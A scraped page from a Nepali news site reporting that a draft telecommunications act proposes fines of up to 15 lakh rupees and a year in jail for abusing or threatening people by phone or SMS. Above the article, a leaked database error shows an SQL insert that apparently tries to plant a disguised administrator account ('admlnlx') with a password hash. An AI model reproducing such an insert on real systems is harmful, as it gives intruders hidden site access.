WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B724Jkk1csSJ4ffq310rluxkevC4CG1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 22:03:40', '', 'admlnlx', 'admlnlx')

फोनबाट गाली गर्नेलाई १ वर्ष जेल र १५ लाखसम्म जरिवाना हुने ! – Gaule Khabar

फोनबाट गाली गर्नेलाई १ वर्ष जेल र १५ लाखसम्म जरिवाना हुने !

फोनबाट गाली गर्नेलाई १ वर्ष जेल र १५ लाखसम्म जरिवाना हुने !

गाउँले न्युज, ६ साउन, काठमाडौं । सूचना प्रविधि विद्येयकमा सामाजिक सञ्जाल प्रयोगकर्तालाई सजायको कडा प्रावधान राखेको भन्दै आलोचना भइरहेका बेला सरकारले फोन प्रयोगकर्ताका लागि पनि उस्तै प्रावधान राखेर कानुन मस्यौदा तयार पारेको छ ।

दूरसञ्चार सेवाका माध्यमबाट कसैलाई गाली, धम्की वा दुख दिए १५ लाखसम्म जरिवाना र एक वर्षसम्म जेल हुने प्रस्ताव गर्दै कानुनको मस्यौदा बनाइएको हो ।

फोन गरेर वा एसएमएसमार्फत अरुलाई गाली गर्ने वा धम्क्याउनेलाई लक्षित गर्दै मस्यौदामा कडा सजायको प्रावधान राखिएको हो ।

सञ्चार तथा सूचना प्रविधि मन्त्रालयले तयार पारेको नयाँ दूरसञ्चार ऐनको मस्यौदामा दूरसञ्चार सेवाका माध्यमबाट गाली गर्ने, धम्क्याउने वा अनावश्यक दुख दिने काम गरे १० देखि १५ लाख रुपैयाँसम्म जतिवाना वा एक वर्षसम्म कैदा वा दुवै सजाय हुने प्रावधान छ । यो खबर आजको कान्तिपुर दैनिकमा छापिएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका